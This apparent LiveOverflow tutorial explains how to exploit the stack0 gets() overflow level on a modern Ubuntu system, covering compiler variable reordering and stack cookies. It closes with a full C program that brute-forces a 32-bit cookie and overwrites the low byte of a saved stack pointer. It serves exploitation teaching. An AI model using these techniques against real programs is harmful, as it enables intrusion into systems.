Simple Buffer Overflow on a Modern System


New here? LiveOverflow is a YouTube channel about IT security.

In December 2015 I uploaded the first video of my Binary Hacking Course - an attempt at creating a visual video course introducing memory corruption and related topics. After a few videos covering topics such as installing Linux in a VM, hexadecimal, writing a simple C program, and using gdb and other tools to reverse engineer programs, I quickly moved to a Linux image to introduce the basics of exploitation. This system does not have ASLR, DEP or other exploit mitigations like stack cookies - so it's easily 20 years behind the current state of the art. Nonetheless, it's very important to understand these easy concepts first.

The first video of level stack0 is now over 1 1/2 years old, and since then the style of my videos has changed drastically as I gained more experience from the creation process. We have finally covered most of the basics. Now it's time to move into the modern world of exploitation, and what better way is there than revisiting this level with a twist - compiled on a modern Ubuntu system. I got the idea because some people watching my videos compiled the code on their own system and were surprised to find that they couldn't reproduce the exploit. And now the question is: is this simple example still exploitable?

Before we try to answer this question, let's refresh our memory about the vulnerability in stack0 and how it can be exploited. You could watch the old video about stack0, or if you are already familiar with the basics, just read the code below.


#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  modified = 0;
  gets(buffer);  // unbounded read into buffer: this is the vulnerability

  if(modified != 0) {
      printf("you have changed the 'modified' variable\n");
  } else {
      printf("Try again?\n");
  }
}

If you are familiar with programming and you read this code, you could be confused about how you would ever reach the "you have changed the 'modified' variable" message, as modified is set to 0 and never changed. But if you know the basics of buffer overflows in C, you will quickly identify the call to gets(). gets() reads user input (until a newline \n or EOF) into the 64-byte character buffer. This buffer[64] and the modified integer are located in stack memory, because they are local variables. In this case the target variable follows the buffer, and reading more characters than the buffer can hold will keep writing data onto the stack and eventually overwrite the zero value of modified (along with everything else that is contained on the stack: return pointer, stored base pointer, environment variables, ...). So the exploit is very easy: send more than 64 characters as input.
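As a minimal sketch, the payload for the old, unprotected stack0 could be built like this. The helper name build_stack0_payload is made up for illustration, and the code assumes that modified sits directly behind the 64-byte buffer; the real distance depends on the compiler and should be checked in a debugger.

```c
#include <stddef.h>
#include <string.h>

#define STACK0_BUFFER_SIZE 64  /* size of buffer[64] in stack0 */

/*
 * Hypothetical helper: fills `out` with 64 filler bytes, 4 non-zero bytes
 * meant to land on `modified`, and the newline that makes gets() return.
 * Assumes `modified` directly follows the buffer (not guaranteed).
 * Returns the payload length, or 0 if `out` is too small.
 */
size_t build_stack0_payload(unsigned char *out, size_t out_size)
{
    const size_t len = STACK0_BUFFER_SIZE + 4 + 1;

    if (out == NULL || out_size < len)
        return 0;

    memset(out, 'A', STACK0_BUFFER_SIZE);        /* fill buffer[64] completely */
    memset(out + STACK0_BUFFER_SIZE, 'B', 4);    /* spill into the next 4 bytes */
    out[STACK0_BUFFER_SIZE + 4] = '\n';          /* gets() stops reading here */
    return len;
}
```

Writing these bytes to the standard input of the program is the whole exploit on the old system.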

But what is different on a modern system? Let's head into part 1.

Part 1: Is it impossible?

Instead of reading, you can also watch my video. I think it's much better than the text.

Buffer overflow on a modern system impossible? stack0: part 1

We have a look at stack level 0 and compile it on a current Ubuntu to see if it's still exploitable.

So let's compile the code on a modern 64bit Ubuntu! And right there we get a first compiler warning that using gets() is dangerous. So these kinds of old-school bugs are really "hard" to make now - the compiler tells you right to your face how dumb you are.

But let's see. When we now try the simple payload, we don't get the "modified" message; instead the program aborts with "stack smashing detected". What a bummer.

So let's have a look at the assembly code. When we look at the local variables referenced in there and draw a stack diagram of where they are located, we notice that the modified variable comes before buffer[64]. This is bad! An overflow only writes toward higher addresses, past the end of the buffer, so we will never overwrite the target variable.

This is actually a pretty clever buffer overflow mitigation and has to do with the stack cookie. You see, buffers are prone to buffer overflows. Thus the compiler reorders the local variables so that non-buffers, like simple integer variables, come before a dangerous buffer. This protects the program from unintended side effects caused by a modified integer. The reordering also has the effect that the buffer is closer to the stack cookie. The stack cookie is responsible for the "stack smashing detected" abort. So let's have a look at how that is implemented:

This function has two different paths it could end in. Either the function executes a return and follows the stored return pointer on the stack (left), or it calls __stack_chk_fail() (right). The latter causes the program to abort without ever executing a return. Which path is chosen depends on a check - the stack cookie check. You can see in the disassembly that a value is referenced from the stack ([rbp-0x8]) and moved into rdx. Then a fancy xor is used to compare this value from the stack with a value stored somewhere else entirely in memory. If they match (the xor result is zero), the function is allowed to return. But if we overwrote this value on the stack with something else, then this check fails and the program is aborted:
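The logic of that check can be modelled in a few lines of C. This is only a simplified sketch of the idea, not the code the compiler actually emits; the function names are made up for illustration.

```c
#include <stdbool.h>
#include <stdint.h>

/*
 * Simplified model of the epilogue check: the xor of two equal values is
 * zero, so a zero result means the cookie on the stack still matches the
 * reference copy kept elsewhere in memory.
 */
bool cookie_intact(uint64_t cookie_on_stack, uint64_t reference_cookie)
{
    return (cookie_on_stack ^ reference_cookie) == 0;
}

/* Models the two exits: 1 = normal return, 0 = the __stack_chk_fail() path. */
int function_exit_path(uint64_t cookie_on_stack, uint64_t reference_cookie)
{
    return cookie_intact(cookie_on_stack, reference_cookie) ? 1 : 0;
}
```

With a made-up reference cookie such as 0x1122334455667700, an overflow that leaves 0x4141414141414141 ("AAAAAAAA") on the stack takes the abort path, while an overflow that happens to write the same value back takes the normal return.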

This obviously also shows that if you knew the cookie value, you could still overflow past it: overwriting the cookie with its correct value changes nothing, so the check passes. But our example program has just a one-shot input - there is no interaction where we could exploit other bugs first to leak the cookie value.

So... what can we do now? Game Over?
Let's have a look at those cookies; there is something interesting about them. Here are a few cookies collected on the 64bit version - we execute the program in the debugger multiple times and take note of the random values:

Notice how all cookies start with a null-byte? Why would you set one byte to a static zero if you could increase the randomness by another byte instead? Well, it's a super clever trick: a lot of buffer overflows are caused by strcpy(), and strings in C are defined to end with a null-byte \0. So even if I told you the cookie value, you would never be able to overflow it with the correct cookie value, because you couldn't write beyond the null-byte. Pretty neat, huh? But in our case we have gets(), and this function only stops at a newline or EOF, so null-bytes in the input are no problem.
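To make the difference concrete, here is a small sketch that counts how many payload bytes would get through in each case. The two helper names are hypothetical and only model the stop conditions; they do not call strcpy() or gets() themselves.

```c
#include <stddef.h>

/*
 * How many payload bytes a strcpy()-style copy would transfer:
 * it stops at the first null byte (the terminator is not counted).
 */
size_t bytes_copied_like_strcpy(const unsigned char *payload, size_t len)
{
    size_t i = 0;
    while (i < len && payload[i] != '\0')
        i++;
    return i;
}

/*
 * How many payload bytes a gets()-style read would store:
 * it only stops at a newline, null bytes pass straight through.
 */
size_t bytes_read_like_gets(const unsigned char *payload, size_t len)
{
    size_t i = 0;
    while (i < len && payload[i] != '\n')
        i++;
    return i;
}
```

For a payload that contains a cookie guess starting with 0x00, the strcpy-style copy ends right at that zero byte, while the gets-style read carries on until the newline.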

Let's have a look at some cookie values on a 32bit version of this program. This is compiled with -m32:

We have a zero byte again! This leaves us with only three random bytes, so at most 0x1000000 (2^24) possible values. That is a bit more than 16 million possible cookies, and in this case it is feasible to just guess and hope to get lucky.

This leaves us with one possible exploit plan. We could try to guess the cookie and when we get lucky we can overflow more of the stack. We can't overflow modified, but we could overflow the return-pointer with the address of the if-case that prints the success "modified" message.

Note: The system has ASLR enabled, but the program itself is not compiled position independent by default. This means addresses of code will be static. Other memory areas like loaded libraries or the stack are randomized.

And I have no better idea than that. This also means 64bit is probably not exploitable, because it's very unlikely we hit the right one of 2^56 (0x100000000000000) possible cookie values. But on 32bit it looks different, and we actually might get lucky there. So let's do that.
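The size of the two search spaces is simple arithmetic and can be written down as a one-liner. The function name below is made up for illustration.

```c
#include <stdint.h>

/*
 * Number of possible cookies when `random_bytes` bytes are random and the
 * remaining byte is fixed to 0x00. Valid for 0 to 7 random bytes.
 */
uint64_t cookie_search_space(unsigned random_bytes)
{
    return UINT64_C(1) << (8 * random_bytes);
}
```

cookie_search_space(3) gives 16,777,216 for the 32bit cookie and cookie_search_space(7) gives 72,057,594,037,927,936 for the 64bit one. At an assumed rate of 1000 attempts per second (a made-up number, just for scale), the worst case is about 4.7 hours on 32bit and over two million years on 64bit.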

Part 2: Let's ignore the cookie and develop the exploit

And again, I suggest you watch the video instead of reading my ramblings.

Identifying another exploit mitigation and find bypass. stack0: part 2

In part 2 we have a closer look at stack0 on a modern system. We are trying to plan an exploit that works in case we can guess the stack cookie. We have to be a bit creative here.

If we want to guess the cookie, we have to be 110% sure that our exploit works. So we first develop the exploit as if we knew the cookie value. We can do that by setting breakpoints in the debugger and just skipping the check. More about that in the video. So let's cause a buffer overflow (as if the cookie was correct) and let's see what happens. It should be easy, because we just overwrite the return pointer and thus control eip (the instruction pointer). But nope... Look what happened:

We get a segfault at the return. Not after the return. At the return. The ret instruction attempts to read the return address from the stack by following esp, and somehow we have overwritten the stack pointer too. What?! What is going on?
Look at the start of main():

Right at the start, the address stored in esp is moved into ecx and then pushed onto the stack. The function not only saves the previous base pointer, but also the current stack pointer, and at the end of the function this value is restored. This means we overwrote it with our buffer overflow. So in order to control the return pointer, we first have to control this stored stack pointer. Damn. But that should be simple, right? Just overwrite this value with one that points into our controlled buffer and we win!

Unfortunately it's not that trivial, because like I mentioned earlier, the stack is randomized due to ASLR. We don't know where the stack and our buffer will be in memory. Game Over?

Not so fast! We know that a correct value is stored there, so we don't have to overwrite the full address! We just overwrite the lowest byte: we fill the buffer with characters right up to the stored stack pointer, and gets() then writes the terminating null-byte (end of string) onto the lowest byte of that value.
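The effect of that single null-byte can be sketched as follows. Both helper names and all addresses used with them are hypothetical; on a real run the values are randomized.

```c
#include <stdbool.h>
#include <stdint.h>

/*
 * Effect of the terminating null byte landing on the lowest byte
 * (little-endian: the first byte in memory) of a saved 32-bit pointer.
 */
uint32_t zero_lowest_byte(uint32_t saved_pointer)
{
    return saved_pointer & 0xffffff00u;
}

/* True if `addr` falls inside [buf_start, buf_start + buf_len). */
bool points_into_buffer(uint32_t addr, uint32_t buf_start, uint32_t buf_len)
{
    return addr >= buf_start && addr - buf_start < buf_len;
}
```

Zeroing the lowest byte never raises the value, it lowers the pointer by 0 to 255 bytes. With a made-up saved value of 0xffb2d4a0 the result is 0xffb2d400, and whether that lands inside the buffer depends entirely on where the buffer happens to be on that run.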

But there is another small annoyance. When you rerun the binary multiple times, not only is the base address (start) of the stack memory area randomized because of ASLR, but the offset inside that area (where our stack frame starts) is randomized as well. If this were not the case, we could have carefully groomed the stack with environment variables (because they are stored at the beginning of the stack), so that overwriting the lowest byte with a zero causes the restored stack pointer to point into our buffer. But the randomization means we have to get lucky. Here are a few collected stack base addresses along with where our stack frame lives:

Now we can put everything together. We fill the buffer with the address of the if-case we want to reach and then overflow far enough to overwrite the lowest byte of the stored stack-pointer with a 0x00. If we are lucky with the randomized offset of the stack-frame we will get this:

After restoring the smashed stack pointer, esp points into our buffer, which is filled with copies of the address of the code that prints the "modified" message. When we continue now, the if-case we want will be executed.
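The payload layout described above can be sketched as a small helper. The function name is hypothetical, and the offsets (64 bytes of buffer, 4 bytes of cookie, 4 bytes of padding) are the ones used in my final code for my particular binary; another build may need different ones.

```c
#include <stddef.h>
#include <stdint.h>

#define GUESS_FILL_SIZE    64                           /* bytes of buffer[64] */
#define GUESS_PAYLOAD_SIZE (GUESS_FILL_SIZE + 4 + 4 + 1)

/*
 * Hypothetical helper building:
 *   [target address x 16][0x00 + 3 guessed cookie bytes][4 bytes padding]['\n']
 * gets() replaces the newline with a null byte, and that null byte is what
 * lands on the lowest byte of the stored stack pointer.
 * Returns the number of bytes written (always GUESS_PAYLOAD_SIZE).
 */
size_t build_guess_payload(unsigned char out[GUESS_PAYLOAD_SIZE],
                           uint32_t target, const unsigned char guess[3])
{
    size_t pos = 0;

    /* fill the buffer with little-endian copies of the target address */
    while (pos < GUESS_FILL_SIZE) {
        out[pos++] = (unsigned char)(target & 0xff);
        out[pos++] = (unsigned char)((target >> 8) & 0xff);
        out[pos++] = (unsigned char)((target >> 16) & 0xff);
        out[pos++] = (unsigned char)((target >> 24) & 0xff);
    }

    out[pos++] = 0x00;          /* first cookie byte is always zero */
    out[pos++] = guess[0];      /* three guessed cookie bytes */
    out[pos++] = guess[1];
    out[pos++] = guess[2];

    for (int i = 0; i < 4; i++) /* padding up to the stored stack pointer */
        out[pos++] = 'B';

    out[pos++] = '\n';          /* ends the gets() call */
    return pos;
}
```

The guessed bytes must not contain a newline, because gets() would stop reading there and the rest of the payload would never arrive.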

Part 3: The full exploit

I don't explain the code here, because you should definitely watch the video.

Bruteforce 32bit Stack Cookie. stack0: part 3

Bruteforcing stack canary, stack guard, stack cookie with a C program.

What is missing is just the logic to guess the cookie value. I decided to write a C program, but somebody else succeeded with a simple shell script. There are several pitfalls in writing this code (hint: stdout buffering), so you should really watch the video, but it's not that important.

Below you can find my final code. I ran it with ghetto parallelization, and after several million attempts I had success:



#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <signal.h>
#include <pty.h>
#include <fcntl.h>
#include <time.h>
#include <sys/wait.h>

#define WAITMAX 10000

int master;

// handle SIGCHLD: the child has exited, so collect what it printed
void handle(int signum)
{
    char buffer1[256];
    char buffer2[256];
    int nread1 = 0;
    int nread2 = 0;
    // read the first output. Should be "Try again"
    nread1 = read(master, buffer1, 12);
    if(nread1>0) buffer1[nread1] = '\0';
    else buffer1[0] = '\0';

    // read the second output. Could be "*** stack smashing detected ***" or the success "modified" message
    // read one byte less than the buffer size to leave room for the null byte
    nread2 = read(master, buffer2, sizeof(buffer2)-1);
    if(nread2>0) buffer2[nread2] = '\0';
    else buffer2[0] = '\0';

    // if the second output starts with "you", we should have gotten the modified success message
    if(nread2>2 && (buffer2[0] == 'y' && buffer2[1] == 'o' && buffer2[2] == 'u')) {
        printf("\nSIG(%d) stdout1 (%d): \"%s\"\n", signum, nread1, buffer1);
        printf("\nSIG(%d) stdout2 (%d): \"%s\"\n", signum, nread2, buffer2);
    }
}
int main(int argc, char* argv[]) {
    time_t start_time;
    int seed;
    int next_debug_msg;
    long exec_count;

    // check if a seed was specified
    if(argc<2) {
        printf("usage: %s <seed>\n",argv[0]);
        return 1;
    }

    // seed the PRNG
    seed = atoi(argv[1]);
    srand(seed);

    // disable buffering for stdout
    setbuf(stdout, NULL);

    // define a signal handler to get notified when a child dies
    struct sigaction sigchld_action = { .sa_handler = handle, .sa_flags = SA_NOCLDWAIT };
    sigaction(SIGCHLD, &sigchld_action, NULL);

    // amount of execs when next message is shown
    next_debug_msg = (rand() % WAITMAX)+1;
    // remember start time to calculate execs per second
    start_time = time(NULL);
    // counting the executions
    exec_count = 0;

    // a pretentious way to do a while(true) loop.
    for(;;) {
        // count the executions
        exec_count++;

        // create a new process and connect it to a pseudo terminal
        // this forces the target process to flush on newlines and we don't loose it because of "abort"
        pid_t pid = forkpty(&master, NULL, NULL, NULL);
        if(pid==-1) exit(1);

        // disable some terminal behaviour like echo input and behaviour of special characters ~(ECHO | ECHONL | ISIG);
        struct termios tios;
        tcgetattr(master, &tios);
        tios.c_lflag = 0; // disable all options
        tcsetattr(master, TCSANOW, &tios);

        if(!pid) {
            // the child: execute stack0 32bit
            char *argv[]={ "./stack0_32", 0};
            execv(argv[0], argv);
            // only reached if execv() failed
            _exit(1);
        } else {
            // the parent: send the buffer overflow payload

            // code redirect target
            // 0x080484cf <+68>:    push   $0x8048590
            // 0x080484d4 <+73>:    call   0x8048360 
            // [0x080484cf][0x080484cf][0x080484cf]...[0x080484cf]|[cookie][padding][overwrite 1 byte of stored esp]
            unsigned char input[] = {0xcf, 0x84, 0x4, 0x8, 0xcf, 0x84, 0x4, 0x8, 0xcf, 0x84, 0x4, 0x8, 0xcf, 0x84, 0x4, 0x8, 0xcf, 0x84, 0x4, 0x8, 0xcf, 0x84, 0x4, 0x8, 0xcf, 0x84, 0x4, 0x8, 0xcf, 0x84, 0x4, 0x8, 0xcf, 0x84, 0x4, 0x8, 0xcf, 0x84, 0x4, 0x8, 0xcf, 0x84, 0x4, 0x8, 0xcf, 0x84, 0x4, 0x8, 0xcf, 0x84, 0x4, 0x8, 0xcf, 0x84, 0x4, 0x8, 0xcf, 0x84, 0x4, 0x8, 0xcf, 0x84, 0x4, 0x8, 0x0, 0x41, 0x41, 0x41, 0x42, 0x42, 0x42, 0x42, 0xa, 0x0};

            // generate three random cookie bytes. (first byte stays 0x00)
            // make sure no newline is included because the target uses gets() and that would stop the input early
            do{ input[65] = (rand() % 256); } while (input[65]=='\n');
            do{ input[66] = (rand() % 256); } while (input[66]=='\n');
            do{ input[67] = (rand() % 256); } while (input[67]=='\n');

            // write the buffer overflow payload to the pseudo terminal
            write(master, input, sizeof(input));

            // check if the process should print current status
            if(exec_count%(next_debug_msg)==0) {
                // avoid a division by zero during the first second
                long elapsed = (long)(time(NULL)-start_time);
                if(elapsed<1) elapsed = 1;
                printf("Process: %d | exec: %ld (%ld/s) | last cookie: [%02x,%02x,%02x]\r", seed, exec_count, exec_count/elapsed, (unsigned char)input[65], (unsigned char)input[66], (unsigned char)input[67]);
                // use random to determine when the next message should be shown, to have each process print another time
                next_debug_msg = (rand() % WAITMAX)+1;
            }

            int status;
            int wait_ret;
            // check for the health of the child process in a loop
            for(int i=0;;i++) {
                wait_ret = waitpid(pid, &status, WNOHANG);
                // break the loop if the child is not running anymore. on to the next round!
                if(wait_ret==-1) break;
                // after the 10th wait send a kill to the child. maybe it's hanging.
                if(wait_ret==0 && i==10) kill(pid, SIGKILL);
                // sleep a short amount of time
                nanosleep((const struct timespec[]){ {0, 10000000L} }, NULL);
            }
            // close the opened pseudo terminal
            close(master);
        }
    }
}